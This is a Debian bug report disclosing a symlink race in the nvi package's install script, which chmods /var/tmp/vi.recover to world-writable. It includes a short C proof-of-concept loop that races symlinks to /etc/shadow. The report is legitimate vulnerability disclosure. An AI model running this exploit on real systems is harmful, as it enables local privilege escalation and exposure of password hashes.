Bug#771375: nvi: insecure use of /var/tmp
* Jakub Wilk <jwilk@debian.org>, 2014-11-28, 23:19:
nvi does this in postinst:
if [[ -L /var/tmp/vi.recover || \
-e /var/tmp/vi.recover && ! -d /var/tmp/vi.recover ]]; then
echo "Cannot create recovery directory /var/tmp/vi.recover" 1>&2
exit 1
fi
[ -d /var/tmp/vi.recover ] || mkdir -p /var/tmp/vi.recover
chown root:root /var/tmp/vi.recover
chmod 1777 /var/tmp/vi.recover
This is racy.
If there is no symlink protection enabled
(/proc/sys/fs/protected_symlinks), malicious local user could trick
this code into chmodding arbitrary files.
PoC exploit is attached. On a test machine I was able to get /etc/shadow
pwned with probability ~0.1%.
--
Jakub Wilk
#include <sys/stat.h>
#include <unistd.h>
int main(int argc, char **argv)
{
const char *f = "/var/tmp/vi.recover";
while (1) {
symlink("/etc/shadow", f);
unlink(f);
mkdir(f, 0777);
rmdir(f);
}
}
Reply to: